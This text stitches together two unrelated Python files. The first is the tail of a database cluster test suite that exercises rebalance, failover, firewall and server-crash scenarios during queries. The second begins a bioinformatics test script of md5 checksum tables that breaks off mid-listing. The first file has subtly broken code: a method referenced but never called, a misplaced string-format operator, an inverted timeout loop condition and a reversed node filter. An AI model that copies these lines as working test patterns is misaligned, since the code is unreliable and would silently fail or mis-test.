rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
self.servers[2:(self.nodes_init + 2)], [],services=['n1ql'])
rebalance.result()
if self.stop_server:
remote = RemoteMachineShellConnection(self.servers[2])
remote.stop_server()
elif self.network_partition:
self.start_firewall_on_node(self.servers[2])
self.sleep(10)
else:
self.cluster.failover(self.servers[:self.nodes_init+2], self.servers[2:self.nodes_init+2])
thread1.join()
self.assertFalse(self.fail, "Queries did not recover")
except Exception as e:
self.log.error(str(e))
finally:
if self.stop_source or self.stop_server:
remote.start_server()
elif self.network_partition:
self.stop_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(300)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
[], [self.servers[0]])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+1],
[self.servers[0]], [], services =['kv,n1ql,index'])
rebalance.result()
def test_rebalance_in_failure(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], [],services=['n1ql'])
time.sleep(1)
self.start_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(120)
thread1.join()
self.assertFalse(self.fail, "Queries did not recover")
except Exception as e:
self.log.error(str(e))
finally:
self.stop_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(300)
def test_rebalance_failure_retry(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
body = {"enabled": "true", "afterTimePeriod": self.retry_time , "maxAttempts" : self.num_retries}
rest = RestConnection(self.master)
rest.set_retry_rebalance_settings(body)
result = rest.get_retry_rebalance_settings()
if self.rebalance_out:
rebalance_server = self.servers[(self.nodes_init-1)]
else:
rebalance_server = self.servers[(self.nodes_init)]
self.log.info("Retry Rebalance settings changed to : {0}"
.format(json.loads(result)))
try:
if self.rebalance_out:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.servers[self.nodes_init - 1]])
else:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], [],services=['n1ql'])
time.sleep(1)
self.start_firewall_on_node(rebalance_server)
rebalance.result()
self.fail("Rebalance did not fail")
except Exception as e:
self.log.error(str(e))
if self.num_retries > 1:
time.sleep(self.retry_time + 30)
self.stop_firewall_on_node(rebalance_server)
time.sleep(10)
self.check_retry_rebalance_succeeded()
finally:
self.stop_firewall_on_node(rebalance_server)
body = {"enabled": "false"}
rest.set_retry_rebalance_settings(body)
self.sleep(60)
def test_rebalance_out_query_node(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.servers[self.nodes_init-1]])
rebalance.result()
if self.stop_server:
output, error = self.shell.execute_command("killall -9 cbq-engine")
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
def test_swap_rebalance_nodes(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + 1],
[],services=["kv"])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:(self.nodes_init+1)],
self.servers[self.nodes_init+1:self.nodes_init + 2],
self.servers[:1],services=["index"])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:(self.nodes_init+3)],
self.servers[self.nodes_init+2:self.nodes_init + 3],
[],services=["n1ql"])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
if self.rebalance_index:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init+1:self.nodes_init+2], services=["kv,n1ql,index"])
elif self.rebalance_n1ql:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init+2:self.nodes_init+3], services=["kv,n1ql,index"])
else:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init:self.nodes_init+1], services=["kv,n1ql,index"])
rebalance.result()
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
def test_swap_rebalance_kv_n1ql_index(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + 1],
[],services=["kv,n1ql,index"])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
self.servers[self.nodes_init+1:self.nodes_init+2],
self.servers[self.nodes_init:self.nodes_init+1], services=["kv,index,n1ql"])
rebalance.result()
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
###########################################################################################################
def test_prepared_with_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1],[],services=['n1ql'])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_between()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
try:
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[1])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_union
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_unnest()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_rebalance_with_server_crash(self):
servr_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_case()
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
servr_in, servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
remote.terminate_process(process_name='memcached')
try:
rebalance.result()
#self.log.info("-"*100)
#self.log.info("Querying alternate query node to test the encoded_prepare ....")
#self.test_prepared_unnest()
#self.log.info("-"*100)
except:
pass
self.cluster.rebalance(self.servers[:self.nodes_init], servr_in, servr_out)
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
def test_prepared_with_failover(self):
try:
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_failover_add_back(self):
try:
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip and str(node.port) == failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_within_list_object()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_autofailover(self):
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
try:
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
rebalance.result()
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_unnest()
self.log.info("-"*100)
finally:
remote.start_server()
self.log.info("Done with encoded_prepare ....")
def test_prepared_with_warmup(self):
try:
num_srv_warm_up = self.input.param("srv_warm_up", 1)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " +\
"Please specify one in conf")
self.test_union_all()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
self.test_union_all()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self, wait_if_warmup=True)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.sleep(50)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.log.info("-"*100)
self.log.info("Querying alternate query node to test the encoded_prepare ....")
self.test_prepared_union()
self.log.info("-"*100)
finally:
self.log.info("Done with encoded_prepare ....")
class QueriesOpsJoinsTests(JoinTests):
def setUp(self):
super(QueriesOpsJoinsTests, self).setUp()
if self.nodes_init > 1 and not self._testMethodName == 'suite_setUp':
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [])
self.test_to_run = self.input.param("test_to_run", "test_join_several_keys")
def suite_setUp(self):
super(QueriesOpsJoinsTests, self).suite_setUp()
def tearDown(self):
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
try:
super(QueriesOpsJoinsTests, self).tearDown()
except:
pass
ClusterOperationHelper.cleanup_cluster(self.servers)
self.sleep(10)
def suite_tearDown(self):
super(QueriesOpsJoinsTests, self).suite_tearDown()
def test_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1], [])
fn()
rebalance.result()
fn()
def test_run_queries_all_rebalance_long(self):
timeout = self.input.param("wait_timeout", 900)
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
rebalance = self.cluster.async_rebalance(self.servers[:1], self.servers[1:self.nodes_in + 1], [])
i = 0
end_time = time.time() + timeout
while rebalance.state != "FINISHED" or time.time() > end_time:
i += 1
self.log.info('ITERATION %s') % i
fn()
rebalance.result()
def test_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[self.nodes_init - i:self.nodes_init - (i - 1)])
fn()
rebalance.result()
fn()
def test_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
fn = getattr(self, self.test_to_run)
fn()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
fn()
rebalance.result()
fn()
def test_failover(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
fn = getattr(self, self.test_to_run)
fn()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
fn()
rebalance.result()
fn()
def test_failover_add_back(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
fn = getattr(self, self.test_to_run)
fn()
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip != failover_node.ip or str(node.port) != failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
fn()
rebalance.result()
fn()
def test_warmup(self):
num_srv_warm_up = self.input.param("srv_warm_up", self.nodes_init)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " + \
"Please specify one in conf")
fn = getattr(self, self.test_to_run)
fn()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
fn()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
fn()
|
test.py
|
import os
import sys
import subprocess
import shutil
import queue
import hashlib as hl
import threading
from threading import Thread
def md5_chksum(fname):
"""
Calculates the md5 checksum of the given file at location.
"""
md5 = hl.md5()
# open file and read in blocks
with open(fname, 'rb') as f:
for chunk in iter(lambda: f.read(4096), b''):
md5.update(chunk)
return md5.hexdigest()
def new_proj():
result = subprocess.check_output(['../../Request.sh', 'new_proj'])
result = result.decode('utf-8').strip()
results = result.split('\n')
_id = results[-2].split(':')[0]
return _id
def infer_samples(_id, md5s):
result = subprocess.check_output(['../../Request.sh', 'infer_samples', '--id', _id])
result = result.decode('utf-8').strip()
same = True
for fname, md5 in md5s.items():
if fname in result:
print('.', end='')
else:
same = False
print('\n{} not in result'.format(fname))
if md5 in result:
print('x', end='')
else:
same = False
print('\n{} not in result'.format(md5))
print()
return same
def test_read_quant(ids):
md5s = {'mt1': {'abundance.h5': '18e19b26635e4300fd4dc7944635d1b9',
'abundance.tsv': 'c454fde411b6f5d7f01b9d575417ded2',
'bs_abundance_0.tsv': 'dffec751379aee6bd0e0705b60332474',
'bs_abundance_1.tsv': '52a4fd1225214740f8c497a00f0a367c',
'bs_abundance_10.tsv': 'e218e20c73dc12585c9b9fa7c4c5f467',
'bs_abundance_11.tsv': '24e6480039a97911f76713df9bfdc768',
'bs_abundance_12.tsv': '68b79ce9389499867a66aea3e4273f91',
'bs_abundance_13.tsv': '7d5e38356d22fd805848ecfc42a23af7',
'bs_abundance_14.tsv': '265045e8fc733fb173adc5238f7f9ef0',
'bs_abundance_15.tsv': '7a6201aeca86df0b1d2aba7cad4ec131',
'bs_abundance_16.tsv': '9678fb8d5857b43b9617636a95474307',
'bs_abundance_17.tsv': '8067cf7c2b4b23db9d84c53635b9beef',
'bs_abundance_18.tsv': '6dc43423790c3cf2a13c43b220c0de32',
'bs_abundance_19.tsv': '3567ecff621feff81a2123426cbf1a90',
'bs_abundance_2.tsv': '46b67c3a2ee5dc2545864b610c2fdd27',
'bs_abundance_20.tsv': '10bff0075d2ae00da5020cea23d5d8d4',
'bs_abundance_21.tsv': '6c8228b963f10e9da2e777220c52a3d3',
'bs_abundance_22.tsv': '9cf09fb89290a1092404e12ba8b14745',
'bs_abundance_23.tsv': '9b305b91019af82adfa893c21bd94e06',
'bs_abundance_24.tsv': 'bbc3dd6a8e75066a316bef45cda9780d',
'bs_abundance_25.tsv': 'e283737890ac2ef7df4f67474f33b712',
'bs_abundance_26.tsv': 'fae8ac9a3b6bb13d6b573e80a1d343bf',
'bs_abundance_27.tsv': '9cca8becbee68b1e35fae707390a966c',
'bs_abundance_28.tsv': '54dbf44bfa20c5efa88a371356930173',
'bs_abundance_29.tsv': 'c7a886973920af4490ec4041953fe7f1',
'bs_abundance_3.tsv': 'ac1aa6c3621054e47cd536668c0b7498',
'bs_abundance_30.tsv': 'b3bf2c823d047b4e248891d672252a2a',
'bs_abundance_31.tsv': 'a0ca9e77db8fe71b395e2c0da557cbde',
'bs_abundance_32.tsv': '93a41be9bf6ee5d00329db1f59ca4c5a',
'bs_abundance_33.tsv': '15eb7c19b5920eebfce462f3e673dd4f',
'bs_abundance_34.tsv': 'f283392521500f047d532a7850de03f8',
'bs_abundance_35.tsv': '6ce337bd84785326491617a9c290bd23',
'bs_abundance_36.tsv': '42b8b86a42d158e9f3b79ef497465940',
'bs_abundance_37.tsv': 'cab46ed2f6fbbc573200cb31a77e9af6',
'bs_abundance_38.tsv': 'a0ddc6e886c9572a5903f50427bd50f9',
'bs_abundance_39.tsv': '7c5deb19853e522ef0dbb8cc969f3998',
'bs_abundance_4.tsv': 'a669b00fb0eb9d6db2aac972674ce925',
'bs_abundance_40.tsv': 'fee60461a584554e81b614a3e6b3e348',
'bs_abundance_41.tsv': 'cfce867bf6b335701b4752adb1e00f6e',
'bs_abundance_42.tsv': 'f9f6265400f2c127e7e0dcb5c9b847f1',
'bs_abundance_43.tsv': '3118383738b8ff3799750ddffd2ca613',
'bs_abundance_44.tsv': 'fda931b40fb09449901f98ce84b9505b',
'bs_abundance_45.tsv': 'c605cb9c3b85d371b3189960b2c42a5c',
'bs_abundance_46.tsv': '0eb4d1396cde3ba015587b5ef029e7c3',
'bs_abundance_47.tsv': '08e60e878eaa6f84503bf14f72dbb44e',
'bs_abundance_48.tsv': '1d2cc167e9a3d4051ee16eb814f500ec',
'bs_abundance_49.tsv': 'fbfc788e7b40626f1ef177954863a829',
'bs_abundance_5.tsv': 'b367eb760131620cec5ce885137a773a',
'bs_abundance_50.tsv': '4f84d0ba19636c0a355b8f4afcf3220b',
'bs_abundance_51.tsv': 'bf060401c7bfb6864748e04864653283',
'bs_abundance_52.tsv': '3c1a13754fd38e00122888846ae50ee9',
'bs_abundance_53.tsv': 'c041c69a271e1a79f5bb7699cd51eaea',
'bs_abundance_54.tsv': '93545da857e1fab53569cac057328081',
'bs_abundance_55.tsv': '912328e66ff92f0e59b5e0363215628d',
'bs_abundance_56.tsv': '2e597ab7006356db65e981c02cfd62bb',
'bs_abundance_57.tsv': 'd353dbb6b512fdef16f1786e45cd7d30',
'bs_abundance_58.tsv': '82d6074bfc03c6b9578c26856305294d',
'bs_abundance_59.tsv': '849d77ebf5382ded9fec484b58732e8c',
'bs_abundance_6.tsv': '6eb26f83f7ab3d0ffb3932f8035c9431',
'bs_abundance_60.tsv': '0327a8e8fb871f1503f785111f37aaa9',
'bs_abundance_61.tsv': '22983c3b28d75cd331f30e02ead02456',
'bs_abundance_62.tsv': '8a806eb6853e85b9afe1fb18dba8947f',
'bs_abundance_63.tsv': 'd10de99d0d09186f2bf82aae5f388b26',
'bs_abundance_64.tsv': '47c22505ff0dec9628c8756986489af2',
'bs_abundance_65.tsv': 'e221e155494318bbd924af3c4e486486',
'bs_abundance_66.tsv': 'fe760b969f824b99f3796d06c2e2c05f',
'bs_abundance_67.tsv': 'ac40e0272c88a28da0cc8d9d18961019',
'bs_abundance_68.tsv': '49cbe5255561e0ec597614da2bf6d4bb',
'bs_abundance_69.tsv': '9efa652cc0a6ccda484f4696ea189c03',
'bs_abundance_7.tsv': 'adb7d24523860beb5662cad2f55ecb4a',
'bs_abundance_70.tsv': 'ee8a3b0aae56de8aa499f1a12eaeb935',
'bs_abundance_71.tsv': 'aa154ad0e59e3d183572026732dfb0e4',
'bs_abundance_72.tsv': '5e004e1a062beea326dd02a115f818c8',
'bs_abundance_73.tsv': 'e47a1b7966396cdafd5815f916eb6981',
'bs_abundance_74.tsv': 'e7ccebf343c82a07737c45fdbaf6de5d',
'bs_abundance_75.tsv': 'fc5f5076d1fd5a742a65415fa08ccfb1',
'bs_abundance_76.tsv': 'a55099126b57bd05fc671ac190bb4b11',
'bs_abundance_77.tsv': '74d690d7ae39c0a919188b455a727d71',
'bs_abundance_78.tsv': '83c4678e384dd2ac106dfb7e5f1aa021',
'bs_abundance_79.tsv': 'cd50bc4f38bdc73039f4a073558f910a',
'bs_abundance_8.tsv': '1468f2109ba72e96ad400f979d83d1c0',
'bs_abundance_80.tsv': '757ba29303b0805a2d5b0117f5f8c869',
'bs_abundance_81.tsv': '06ecad36bf1a2fa90c05ea8535407abd',
'bs_abundance_82.tsv': 'ac5c0fadd4f21fe02d35ba9d16a2f061',
'bs_abundance_83.tsv': '8706afc7ca2527aba4aed0aaca3c683e',
'bs_abundance_84.tsv': 'fd0041b783324eea4d81db9cf2a1bc52',
'bs_abundance_85.tsv': '094c9c704a1d2a01e1dff2812397a527',
'bs_abundance_86.tsv': '49656f9d19a0eed3dceefd94d6cbf2ea',
'bs_abundance_87.tsv': '9a2afa652436c6b045cd8a44347ee03d',
'bs_abundance_88.tsv': '0b48593f6ca526bf016cd48115b350fe',
'bs_abundance_89.tsv': '45f46126ff05ef6881233cf8df50aa61',
'bs_abundance_9.tsv': '3e4842db5b118def2d58e3d8e1487528',
'bs_abundance_90.tsv': '3b4cac3410a0b778a49d5819afed21ac',
'bs_abundance_91.tsv': '6a477667e807afc687d7f0d4cd5d45eb',
'bs_abundance_92.tsv': 'e72a2c91aab749253b74d34565e5b084',
'bs_abundance_93.tsv': '1c3f06d564209cfcaadd3547d44f1e01',
'bs_abundance_94.tsv': '3a1e15043250cc18981610412547cfa0',
'bs_abundance_95.tsv': 'd864f0b812ab6db4c46617811af5de25',
'bs_abundance_96.tsv': '77ef9e5a5a1f36de7037dd4a9e302b58',
'bs_abundance_97.tsv': 'cc1edb9797ba244a8ffc02fc2382cf99',
'bs_abundance_98.tsv': 'd4d49e8364afada3e4910377072f1e7b',
'bs_abundance_99.tsv': '814c164823838b7c93a2022546d4943d',
'run_info.json': '802f5708307f580819e888b28b4aed5b'},
'mt2': {'abundance.h5': '09226f235687d9e38db360f115e2abbf',
'abundance.tsv': 'd4ed767adb992e41ab477ba68c948e19',
'bs_abundance_0.tsv': '053ef3164ce283cf447942f3497dfab1',
'bs_abundance_1.tsv': '5879aa7a04cd355599ea4168343240fc',
'bs_abundance_10.tsv': 'e0f360d23733ef4f70292c3e03a466ec',
'bs_abundance_11.tsv': 'ad037a33ac185046ea8d6214776f3b3f',
'bs_abundance_12.tsv': '02d9e1a89493d99b06c95136ba178e24',
'bs_abundance_13.tsv': '34f149f93812faab0c28043ad1df7041',
'bs_abundance_14.tsv': 'f9e27a842834510a8f836899e9c46b6f',
'bs_abundance_15.tsv': '068f056dfcff7fb99010bc4f9c25706d',
'bs_abundance_16.tsv': 'e5a3609e8cef51bd638eda76443ef172',
'bs_abundance_17.tsv': '4c2c95c7c0da2bf6c01ba4c3006a66e0',
'bs_abundance_18.tsv': '4a20b472aa619cda59dbb45f620c7d0e',
'bs_abundance_19.tsv': '093f42713d5deffc3e7c1e222796b36a',
'bs_abundance_2.tsv': 'b5414983d33909aa08f052050c89f217',
'bs_abundance_20.tsv': 'ec538481a95018f85e7cd5f4d285f66e',
'bs_abundance_21.tsv': '5f376260406248cde7be07d8aad7304f',
'bs_abundance_22.tsv': '8982d120f1330a61e13e0940df3645c9',
'bs_abundance_23.tsv': '1a5bcb501b9436f68f84f3890674a62c',
'bs_abundance_24.tsv': '8461adc81566244ec4bdbcfc71036d31',
'bs_abundance_25.tsv': '1033ad357389741d103187c6e893dcc1',
'bs_abundance_26.tsv': '8099b55197230eb10ba939e53f1cdae2',
'bs_abundance_27.tsv': 'be9da0d85f1636ab94fc7a8350909b9e',
'bs_abundance_28.tsv': 'a4e20780ffd2f97fc8e2a474cfa11bb1',
'bs_abundance_29.tsv': '31da7d5e1cb8f6aa837c4a23dfca045b',
'bs_abundance_3.tsv': '03a03e1a1ce7df5e9a080bec1ad87200',
'bs_abundance_30.tsv': '70aebbac112e38bcc69e2349fa5d9841',
'bs_abundance_31.tsv': '8158e46d809587654972345eed9aeefe',
'bs_abundance_32.tsv': 'd6955aeb64c11698291bf43538231791',
'bs_abundance_33.tsv': '477d557e424e00fae6222ef5fab2b730',
'bs_abundance_34.tsv': 'e6395c3829765a762e332b59dc2cfb08',
'bs_abundance_35.tsv': '00d29b6de9d33b7593de039a86ec10dd',
'bs_abundance_36.tsv': '68d880dde9584438cd0a7705d34f0c52',
'bs_abundance_37.tsv': '809e687dd144bb9324b6ceef1399e04c',
'bs_abundance_38.tsv': '4300dd6d0733726b6d4f2ebaae572d64',
'bs_abundance_39.tsv': 'bb10f9e392905842df0abadd53b27fd7',
'bs_abundance_4.tsv': '78710d139db1df92543ca9c5535de15c',
'bs_abundance_40.tsv': 'ac199e19dbf8b80d9c0f177742024769',
'bs_abundance_41.tsv': '18f064e7de58eca6801578a155f71fac',
'bs_abundance_42.tsv': '2c857fc3386996989b823df8422b7c7d',
'bs_abundance_43.tsv': '664cdfa73eaa69b57880d952ff8f827d',
'bs_abundance_44.tsv': 'd103abc9f145afe69c8d3382ac6d35db',
'bs_abundance_45.tsv': 'b45506bee4f9f564a651946bc9761e38',
'bs_abundance_46.tsv': 'e13969000eaccf0364ddf663350b68f7',
'bs_abundance_47.tsv': 'c93468cf5fab98edb880eba759125119',
'bs_abundance_48.tsv': '9cf40f680825246069a1f24c775ccc83',
'bs_abundance_49.tsv': '91cbe755af7cada7abefa2c2615c715b',
'bs_abundance_5.tsv': '506e02e4ad23a3ae0be63fea6097e0db',
'bs_abundance_50.tsv': 'fd168b48f41133dc0d89ba1952bc4368',
'bs_abundance_51.tsv': 'bc1ceb05c4caa4dd82a41839c747c871',
'bs_abundance_52.tsv': '3f36280f002a42ed45fee588457542c9',
'bs_abundance_53.tsv': '929bc94d1d95e03c0f26ab3719d9a332',
'bs_abundance_54.tsv': '7d469926f4d6e7695078590b103c2a27',
'bs_abundance_55.tsv': 'a3065808f108ea4f5f3d899f26841e40',
'bs_abundance_56.tsv': '3ad1f26e66a6425e5462fdbeb8bc6dd2',
'bs_abundance_57.tsv': '2cfd8fd8ce0c18340972059ae8c0c306',
'bs_abundance_58.tsv': 'b3ec89f0d2da80ee7135917de3274ae2',
'bs_abundance_59.tsv': 'f4e85d70a8ac675ce1a5ff3f69ecf7a3',
'bs_abundance_6.tsv': 'f8ca6432829694111f41728746d630f4',
'bs_abundance_60.tsv': '2e51034f409587e7eca92013e6f718df',
'bs_abundance_61.tsv': '772e8d7b58a9ade800c9d866c8184223',
'bs_abundance_62.tsv': 'e3e88d0e09f8c210b13e0694fefc72e1',
'bs_abundance_63.tsv': 'c40c5a83e4e46adb3087dc00ae8eb545',
'bs_abundance_64.tsv': '7d905b7961347883813cd2b4626a74ca',
'bs_abundance_65.tsv': 'b42b46cf8430c0b44e24ed2088c72c4d',
'bs_abundance_66.tsv': '8e7137b27ada3345535a69d271ca4c49',
'bs_abundance_67.tsv': 'c3f08113c043beed5bd60d9316151615',
'bs_abundance_68.tsv': '2222f22fd9981ca3aee4a960526b3080',
'bs_abundance_69.tsv': '5a1a6852c689fc7a061745008958c45e',
'bs_abundance_7.tsv': '2ae77ce9de2027c0f77ebd02f525609b',
'bs_abundance_70.tsv': '42606eb9e36a9a18bb58038fea2c9e22',
'bs_abundance_71.tsv': '9a83c39e0e7c1576a15d601b798d9058',
'bs_abundance_72.tsv': '958503b55644e3ce327cc4257ea5ca07',
'bs_abundance_73.tsv': '5b449fa979f13e5394861c8ecb7ede6f',
'bs_abundance_74.tsv': '843864a6366400e2a89162239d48435e',
'bs_abundance_75.tsv': 'cd90d5a0fcba0a4d0e892ad38fa9d4dd',
'bs_abundance_76.tsv': 'db250387f2a6993fc4b5c85b4aaba9f2',
'bs_abundance_77.tsv': '89f8a5b95562f0f023da327a866ea4ac',
'bs_abundance_78.tsv': '4624d855e0ea3d735bad767678036594',
'bs_abundance_79.tsv': 'c1050dac160b4dc26b22558f15a793b7',
'bs_abundance_8.tsv': '8ec7229611b912dd964a52b8cce1fbeb',
'bs_abundance_80.tsv': 'fe4b693d6d6e97585cc3d04af21ade3a',
'bs_abundance_81.tsv': '3b29cf7e8a51f28a4e4ef436a7c5fd74',
'bs_abundance_82.tsv': '8a99c60e21715dd11e6c294e5960822f',
'bs_abundance_83.tsv': 'cad5bcbf4e083d67f7c051a12678b406',
'bs_abundance_84.tsv': 'e007a8d635be31072820d31d4ef2af2b',
'bs_abundance_85.tsv': 'da3fe8486044d19cc8ee7770f2c005c0',
'bs_abundance_86.tsv': '3fe14d22464a4b691fae5407af18f997',
'bs_abundance_87.tsv': 'a3060430b5a17b20f0f906ea19a52c20',
'bs_abundance_88.tsv': 'e5028b212ebcbd8042ec02901e31378e',
'bs_abundance_89.tsv': '22dd83a40223e7636b30d929007f78d0',
'bs_abundance_9.tsv': '686da5c49b0d9957271a5ebecc64aeb1',
'bs_abundance_90.tsv': '80d111aad29a73301233ab4ca8c5d973',
'bs_abundance_91.tsv': '55eb92c2d3f72980bacbd48556ddbcad',
'bs_abundance_92.tsv': 'be98d8ceac768d250ed49c8576d7ac51',
'bs_abundance_93.tsv': '027e08f0476ee690215f350958f6836f',
'bs_abundance_94.tsv': '640455d0747767e6b70905952d4f40b3',
